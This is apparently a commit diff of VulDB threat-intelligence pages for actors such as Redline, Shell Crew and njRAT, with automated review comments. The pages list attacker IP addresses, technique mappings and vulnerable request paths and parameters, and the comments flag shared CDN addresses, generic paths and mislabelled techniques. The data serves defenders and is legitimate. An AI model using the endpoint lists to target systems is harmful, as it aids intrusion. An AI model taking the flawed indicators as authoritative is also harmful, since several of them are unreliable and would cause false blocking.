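Review bot: the new row 3 pairs T1587.003 with "Improper Certificate Validation", and these do not describe the same thing: T1587.003 is "Develop Capabilities: Digital Certificates", an adversary obtaining certificates for its own infrastructure, whereas "Improper Certificate Validation" is the title of CWE-295, a flaw in a client that fails to check a certificate it is presented with. Exploiting a CWE-295 weakness in a target does not imply the actor develops certificates, so either the mapping rule needs a justification or the technique should be changed; row 2 (T1499 "Endpoint Denial of Service" for a resource consumption weakness) is the kind of pairing that does hold.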
@ -57,10 +51,10 @@ ID | Type | Indicator | Confidence
|
|||
-- | ---- | --------- | ----------
|
||||
1 | File | `/cgi-bin/go` | Medium
|
||||
2 | File | `/cgi-bin/portal` | High
|
||||
3 | File | `kbdint.c` | Medium
|
||||
4 | File | `wp-admin/admin-post.php?swp_debug=load_options` | High
|
||||
5 | Argument | `ACTION` | Low
|
||||
6 | Argument | `swp_url` | Low
|
||||
3 | File | `admin/conf_users_edit.php` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 5 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
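Review bot: old row 4 `wp-admin/admin-post.php?swp_debug=load_options` carried its query string inside a `File` indicator while the matching parameter `swp_url` sat in a separate `Argument` row; both are now behind `There are 5 more`, but the convention should be settled in the generator: either `File` is the path only (and `swp_debug` becomes an Argument row) or the full request is kept in one row, otherwise the same request is represented differently depending on which rows happen to be visible.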
@ -73,9 +67,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Redline - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Redline](https://vuldb.com/?actor.redline). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Redline](https://vuldb.com/?actor.redline). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.redline](https://vuldb.com/?actor.redline)
|
||||
|
||||
|
@ -13,7 +13,7 @@ These countries are directly (e.g. origin of attacks) or indirectly (e.g. access
|
|||
* TR
|
||||
* ...
|
||||
|
||||
There are 9 more country items available. Please use our online service to access the data.
|
||||
There are 10 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -31,19 +31,14 @@ ID | IP address | Hostname | Confidence
|
|||
8 | 23.23.104.250 | ec2-23-23-104-250.compute-1.amazonaws.com | Medium
|
||||
9 | 23.46.238.194 | a23-46-238-194.deploy.static.akamaitechnologies.com | High
|
||||
10 | 34.76.8.115 | 115.8.76.34.bc.googleusercontent.com | Medium
|
||||
11 | 37.46.150.90 | redflower.bar | High
|
||||
11 | 37.46.150.90 | - | High
|
||||
12 | 45.33.89.196 | li1035-196.members.linode.com | High
|
||||
13 | 45.67.231.50 | licher.lone.example.com | High
|
||||
14 | 45.84.0.108 | pangeransosmed.vip | High
|
||||
15 | 45.84.0.200 | 1c.capricorn.md | High
|
||||
16 | 45.128.150.68 | dok.com | High
|
||||
17 | 45.130.147.55 | - | High
|
||||
18 | 45.139.184.124 | vps150027.vpsville.ru | High
|
||||
19 | 45.146.164.230 | - | High
|
||||
20 | 46.29.114.16 | pointer.vps.house | High
|
||||
21 | ... | ... | ...
|
||||
16 | ... | ... | ...
|
||||
|
||||
There are 57 more IOC items available. Please use our online service to access the data.
|
||||
There are 62 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
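Review bot: row 11 loses its hostname (`redflower.bar` becomes `-`) with confidence still High; a PTR that has since disappeared is itself a pivot, so keep the previous name with a last-seen date rather than blanking it. In the same hunk, context row 13 `licher.lone.example.com` is under the reserved example.com domain (RFC 2606), so it cannot be a resolvable name and was set by whoever controls that reverse zone; it should not count towards a High rating for the hostname column.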
@ -54,10 +49,9 @@ ID | Technique | Description | Confidence
|
|||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | T1211 | 7PK Security Features | High
|
||||
5 | ... | ... | ...
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 7 more TTP items available. Please use our online service to access the data.
|
||||
There are 9 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
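Review bot: one visible row is removed (T1211) while the hidden count goes from 7 to 9, so the total rises from 11 to 12 and one technique was added somewhere in the hidden part; the diff cannot show which. This is the weak point of committing truncated tables: the change that matters (a new technique attributed to the actor) is not inspectable in review. Commit the full table, or at least the complete list of technique IDs, and truncate only in the rendered view.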
@ -73,11 +67,34 @@ ID | Type | Indicator | Confidence
|
|||
6 | File | `/cgi-bin/supervisor/PwdGrp.cgi` | High
|
||||
7 | File | `/Config/SaveUploadedHotspotLogoFile` | High
|
||||
8 | File | `/dev/shm` | Medium
|
||||
9 | File | `/getcfg.php` | Medium
|
||||
10 | File | `/goform/RgUrlBlock.asp` | High
|
||||
11 | ... | ... | ...
|
||||
9 | File | `/dl/dl_print.php` | High
|
||||
10 | File | `/getcfg.php` | Medium
|
||||
11 | File | `/goform/RgUrlBlock.asp` | High
|
||||
12 | File | `/index.php` | Medium
|
||||
13 | File | `/info.asp` | Medium
|
||||
14 | File | `/info.xml` | Medium
|
||||
15 | File | `/jeecg-boot/sys/common/upload` | High
|
||||
16 | File | `/mc-admin/post.php?state=delete&delete` | High
|
||||
17 | File | `/product_list.php` | High
|
||||
18 | File | `/see_more_details.php` | High
|
||||
19 | File | `/ucms/chk.php` | High
|
||||
20 | File | `5.2.9\syscrb.exe` | High
|
||||
21 | File | `abc-pcie.c` | Medium
|
||||
22 | File | `adclick.php` | Medium
|
||||
23 | File | `addentry.php` | Medium
|
||||
24 | File | `addmember.php` | High
|
||||
25 | File | `addtocart.asp` | High
|
||||
26 | File | `addtomylist.asp` | High
|
||||
27 | File | `admin.php/admin/configset/index/group/upload.html` | High
|
||||
28 | File | `admin.x-shop.php` | High
|
||||
29 | File | `admin/auth.php` | High
|
||||
30 | File | `admin/category.inc.php` | High
|
||||
31 | File | `admin/config/confmgr.php` | High
|
||||
32 | File | `admin/import/class-import-settings.php` | High
|
||||
33 | File | `admin/user/group/update` | High
|
||||
34 | ... | ... | ...
|
||||
|
||||
There are 310 more IOA items available. Please use our online service to access the data.
|
||||
There are 292 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
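Review bot: the table mixes three kinds of path under the single type `File`: request paths (`/index.php`, `/jeecg-boot/sys/common/upload`), a Windows executable path (`5.2.9\syscrb.exe`, row 20) and a source file name (`abc-pcie.c`, row 21) that identifies where a bug lives and cannot be observed on a target at all. Context row 8 `/dev/shm` is the opposite problem, a standard tmpfs mount present on every Linux system. Tagging the kind of path, or keeping source-file names out of an "Indicator of Attack" list, would make the High ratings meaningful.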
@ -93,9 +110,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Roaming Tiger - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Roaming Tiger](https://vuldb.com/?actor.roaming_tiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Roaming Tiger](https://vuldb.com/?actor.roaming_tiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.roaming_tiger](https://vuldb.com/?actor.roaming_tiger)
|
||||
|
||||
|
@ -41,9 +41,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Shell Crew - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Shell Crew](https://vuldb.com/?actor.shell_crew). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Shell Crew](https://vuldb.com/?actor.shell_crew). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.shell_crew](https://vuldb.com/?actor.shell_crew)
|
||||
|
||||
|
@ -21,12 +21,9 @@ ID | IP address | Hostname | Confidence
2 | 43.249.81.210 | - | High
3 | 50.115.138.215 | 50-115-138-215.genericreverse.com | High
4 | 92.242.144.2 | - | High
5 | 118.193.153.5 | - | High
6 | 119.57.196.30 | - | High
7 | 122.10.9.154 | - | High
8 | ... | ... | ...
5 | ... | ... | ...

There are 12 more IOC items available. Please use our online service to access the data.
There are 15 more IOC items available. Please use our online service to access the data.

## TTP - Tactics, Techniques, Procedures

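Review bot: the preview in this hunk shrinks from rows 2-7 to rows 2-4 and the hidden count moves 12 → 15, which matches the three rows (118.193.153.5, 119.57.196.30, 122.10.9.154) that left the preview, so no indicator was retired here. Because the rendered diff reads as a deletion of three IPs, the same reconciliation is worth doing for every IOC/IOA hunk in this commit: the number of rows that disappear from the table should equal the growth of the "There are N more" line unless an indicator was actually dropped, and a dropped indicator deserves its own note so that defenders who already block it know it was withdrawn.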
@ -46,10 +43,9 @@ ID | Type | Indicator | Confidence
1 | File | `fs/aio.c` | Medium
2 | File | `index.php?mod=main&opt=personal` | High
3 | File | `pkg/tool/path.go` | High
4 | File | `receiver.c` | Medium
5 | File | `routes/api/v1/api.go` | High
6 | Argument | `avatar_file` | Medium
7 | Argument | `m1_idlist` | Medium
4 | ... | ... | ...

There are 4 more IOA items available. Please use our online service to access the data.

## References

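Review bot: in this hunk rows 4-7 (`receiver.c`, `routes/api/v1/api.go`, `avatar_file`, `m1_idlist`) leave the preview but the trailing "There are 4 more IOA items available" line is unchanged, so the visible total drops from 11 to 7; either the four indicators were retired, which the change does not say, or the hidden count should have become 8 as it does in the other hunks of this commit. Worth confirming against the generator before merging, because a stale count is the only signal a consumer has that the file is complete.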
@ -62,9 +58,9 @@ The following list contains external sources which discuss the actor and the ass

The following articles explain our unique predictive cyber threat intelligence:

* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)

## License

(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -1,6 +1,6 @@
# South Asia Unknown - Cyber Threat Intelligence

The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [South Asia Unknown](https://vuldb.com/?actor.south_asia_unknown). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [South Asia Unknown](https://vuldb.com/?actor.south_asia_unknown). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.

Live data and more analysis capabilities are available at [https://vuldb.com/?actor.south_asia_unknown](https://vuldb.com/?actor.south_asia_unknown)

@ -21,7 +21,7 @@ These indicators of compromise indicate associated network ressources which are

ID | IP address | Hostname | Confidence
-- | ---------- | -------- | ----------
1 | 91.92.136.239 | - | High
1 | 91.92.136.239 | osca.gotdns.ch | High
2 | 139.28.38.231 | 139.28.38.231.deltahost-ptr | High
3 | 139.28.38.236 | 139.28.38.236.deltahost-ptr | High
4 | ... | ... | ...
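Review bot: row 1 gains the hostname `osca.gotdns.ch` for 91.92.136.239 while its Confidence stays High, but `gotdns.ch` is a dynamic-DNS domain, so the name can point at a different address at any time; the hostname and the IP age separately and should be treated as two indicators with their own observation date rather than one High-confidence pair. A resolution timestamp, or a note that the hostname came from passive DNS, would make the row usable for retrospective matching. Style point outside this change: the context line in the hunk header still reads "network ressources" (double s).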
@ -51,15 +51,9 @@ ID | Type | Indicator | Confidence
2 | File | `/uncpath/` | Medium
3 | File | `category.php` | Medium
4 | File | `classified_right.php` | High
5 | File | `courier/1000@/oauth/playground/callback.html` | High
6 | File | `data/gbconfiguration.dat` | High
7 | File | `Form2File.htm` | High
8 | File | `home/seos/courier/web/wmProgressstat.html.php` | High
9 | File | `html/install.php` | High
10 | File | `index.php` | Medium
11 | ... | ... | ...
5 | ... | ... | ...

There are 27 more IOA items available. Please use our online service to access the data.
There are 33 more IOA items available. Please use our online service to access the data.

## References

@ -71,9 +65,9 @@ The following list contains external sources which discuss the actor and the ass

The following articles explain our unique predictive cyber threat intelligence:

* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)

## License

(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -34,14 +34,9 @@ ID | IP address | Hostname | Confidence
5 | 43.128.232.152 | - | High
6 | 43.129.239.78 | - | High
7 | 43.133.160.144 | - | High
8 | 45.95.11.151 | vm220095.pq.hosting | High
9 | 45.95.11.153 | vm284420.pq.hosting | High
10 | 45.95.11.154 | l-universe.com | High
11 | 45.95.11.155 | kuhtin.com | High
12 | 45.95.11.157 | mail.hottiesforums.com | High
13 | ... | ... | ...
8 | ... | ... | ...

There are 24 more IOC items available. Please use our online service to access the data.
There are 29 more IOC items available. Please use our online service to access the data.

## TTP - Tactics, Techniques, Procedures

@ -71,10 +66,9 @@ ID | Type | Indicator | Confidence
7 | File | `/uncpath/` | Medium
8 | File | `adclick.php` | Medium
9 | File | `admin/getparam.cgi` | High
10 | File | `admin/infoclass_update.php` | High
11 | ... | ... | ...
10 | ... | ... | ...

There are 71 more IOA items available. Please use our online service to access the data.
There are 72 more IOA items available. Please use our online service to access the data.

## References

@ -93,4 +87,4 @@ The following articles explain our unique predictive cyber threat intelligence:

## License

(c) [1997-2021](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -1,6 +1,6 @@
# njRAT - Cyber Threat Intelligence

The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [njRAT](https://vuldb.com/?actor.njrat). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [njRAT](https://vuldb.com/?actor.njrat). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.

Live data and more analysis capabilities are available at [https://vuldb.com/?actor.njrat](https://vuldb.com/?actor.njrat)

@ -13,7 +13,7 @@ These countries are directly (e.g. origin of attacks) or indirectly (e.g. access
* FR
* ...

There are 1 more country items available. Please use our online service to access the data.
There are 2 more country items available. Please use our online service to access the data.

## IOC - Indicator of Compromise

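Review bot: the changed line goes from "There are 1 more country items available" to "There are 2 more country items available"; the old text shows the generator emits "are ... items" regardless of the count, so with one hidden item the sentence is ungrammatical. Since these files are regenerated, the fix belongs in the template (singular form when N is 1), not in the Markdown.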
@ -24,12 +24,9 @@ ID | IP address | Hostname | Confidence
1 | 23.3.13.88 | a23-3-13-88.deploy.static.akamaitechnologies.com | High
2 | 23.3.13.154 | a23-3-13-154.deploy.static.akamaitechnologies.com | High
3 | 41.200.44.39 | - | High
4 | 41.200.143.212 | - | High
5 | 46.243.150.150 | - | High
6 | 52.128.23.153 | - | High
7 | ... | ... | ...
4 | ... | ... | ...

There are 10 more IOC items available. Please use our online service to access the data.
There are 13 more IOC items available. Please use our online service to access the data.

## TTP - Tactics, Techniques, Procedures

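Review bot: rows 1 and 2 of the preview, 23.3.13.88 and 23.3.13.154 with `a23-3-13-*.deploy.static.akamaitechnologies.com` hostnames at High confidence, are Akamai CDN edge addresses shared by many unrelated tenants, so a consumer who blocks or alerts on them from this table will hit legitimate traffic; they are context lines here, but this change is what keeps them in the short preview while moving 41.200.143.212, 46.243.150.150 and 52.128.23.153 into the hidden set (10 → 13 reconciles with the three rows that left). Suggest Low confidence or an explicit shared-infrastructure flag on CDN rows so that automated consumers weight them accordingly.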
@ -40,6 +37,9 @@ ID | Technique | Description | Confidence
1 | T1059.007 | Cross Site Scripting | High
2 | T1068 | Execution with Unnecessary Privileges | High
3 | T1211 | 7PK Security Features | High
4 | ... | ... | ...

There are 2 more TTP items available. Please use our online service to access the data.

## IOA - Indicator of Attack

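Review bot: the two added rows pair ATT&CK technique IDs with weakness names that are not the ATT&CK names: in ATT&CK `T1068` is "Exploitation for Privilege Escalation" and `T1211` is "Exploitation for Defense Evasion", while "Execution with Unnecessary Privileges" and "7PK Security Features" are CWE titles (the existing row 1 follows the same pattern, `T1059.007` with "Cross Site Scripting"). If the Description column is a CWE-to-ATT&CK mapping, say so in the column header or add a CWE column; as written, a reader who copies the table into a detection plan gets the wrong technique. Also, three rows are added while "There are 2 more TTP items available" is unchanged, which is consistent only if the hidden set was untouched; worth confirming.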
@ -47,19 +47,13 @@ These indicators of attack list the potential fragments used for technical activ

ID | Type | Indicator | Confidence
-- | ---- | --------- | ----------
1 | File | `books.php` | Medium
2 | File | `data/gbconfiguration.dat` | High
3 | File | `devices.inc.php` | High
4 | File | `ecrire/inc/filtres.php` | High
5 | File | `goform/AdvSetDns?GO=wan_dns.asp` | High
6 | File | `guestbook.cgi` | High
7 | File | `html/config` | Medium
8 | File | `inc/config.php` | High
9 | File | `index.js` | Medium
10 | File | `index.php` | Medium
11 | ... | ... | ...
1 | File | `/uncpath/` | Medium
2 | File | `/var/log/nginx` | High
3 | File | `books.php` | Medium
4 | File | `data/gbconfiguration.dat` | High
5 | ... | ... | ...

There are 18 more IOA items available. Please use our online service to access the data.
There are 28 more IOA items available. Please use our online service to access the data.

## References

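Review bot: the two new preview rows `/uncpath/` (Medium) and `/var/log/nginx` (High) are weak as file indicators: `/var/log/nginx` is the default log directory of every nginx install and `/uncpath/` is a generic fragment rather than a concrete path, so matching either on its own will flag benign hosts, and giving the more generic of the two the higher confidence is inverted. Suggest Low for both, or a Type other than File for `/var/log/nginx` (the value is a directory), so that consumers who load this table into a scanner weight them accordingly. The counts reconcile: rows 3-10 move to the hidden set and two rows are added, 18 + 8 + 2 = 28.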
@ -75,9 +69,9 @@ The following list contains external sources which discuss the actor and the ass

The following articles explain our unique predictive cyber threat intelligence:

* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)

## License

(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -87,31 +87,31 @@ ID | Type | Indicator | Confidence
28 | File | `/uncpath/` | Medium
29 | File | `/Upload/admin/index.php?module=forum-management&action=add` | High
30 | File | `/uploads/dede` | High
31 | File | `/var/log/messages` | High
32 | File | `/WEB-INF/web.xml` | High
33 | File | `/webman/info.cgi` | High
34 | File | `/wp-json/wc/v3/webhooks` | High
35 | File | `/_next` | Low
36 | File | `AccessPoint.aspx` | High
37 | File | `actions.hsp` | Medium
38 | File | `activateuser.aspx` | High
39 | File | `AdHocQuery_Processor.aspx` | High
40 | File | `admin.asp` | Medium
41 | File | `admin.php?m=admin&c=site&a=save` | High
42 | File | `admin/admin.asp` | High
43 | File | `admin/backupdb.php` | High
44 | File | `admin/bitrix.mpbuilder_step2.php` | High
45 | File | `admin/bitrix.xscan_worker.php` | High
46 | File | `admin/gb-dashboard-widget.php` | High
47 | File | `admin/images.aspx` | High
48 | File | `admin/login.asp` | High
49 | File | `admin/mcart_xls_import.php` | High
50 | File | `admin/modules/tools/ip_history_logs.php` | High
51 | File | `admin/orion.extfeedbackform_efbf_forms.php` | High
52 | File | `admin/ueditor/uploadFile` | High
31 | File | `/usr/bin/pkexec` | High
32 | File | `/var/log/messages` | High
33 | File | `/WEB-INF/web.xml` | High
34 | File | `/webman/info.cgi` | High
35 | File | `/wp-json/wc/v3/webhooks` | High
36 | File | `/_next` | Low
37 | File | `AccessPoint.aspx` | High
38 | File | `actions.hsp` | Medium
39 | File | `activateuser.aspx` | High
40 | File | `AdHocQuery_Processor.aspx` | High
41 | File | `admin.asp` | Medium
42 | File | `admin.php?m=admin&c=site&a=save` | High
43 | File | `admin/admin.asp` | High
44 | File | `admin/backupdb.php` | High
45 | File | `admin/bitrix.mpbuilder_step2.php` | High
46 | File | `admin/bitrix.xscan_worker.php` | High
47 | File | `admin/gb-dashboard-widget.php` | High
48 | File | `admin/images.aspx` | High
49 | File | `admin/login.asp` | High
50 | File | `admin/mcart_xls_import.php` | High
51 | File | `admin/modules/tools/ip_history_logs.php` | High
52 | File | `admin/orion.extfeedbackform_efbf_forms.php` | High
53 | ... | ... | ...

There are 458 more IOA items available. Please use our online service to access the data.
There are 459 more IOA items available. Please use our online service to access the data.

## References

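Review bot: the single substantive change in this hunk is the new row `31 | File | /usr/bin/pkexec | High`; inserting it in sorted order renumbers rows 31-52 and pushes `admin/ueditor/uploadFile` out of the preview (hidden count 458 → 459, which reconciles). Two points: `/usr/bin/pkexec` is the standard polkit binary present on most Linux installs, so as a file-path indicator it matches everywhere and only carries meaning next to the vulnerability record it was derived from; a Low confidence or a link to that record would stop consumers from alerting on its mere presence. And because the ID column shifts whenever an entry is inserted, it cannot serve as a stable reference; if anything downstream cites "IOA 31", give rows a stable key or state that IDs are a display index.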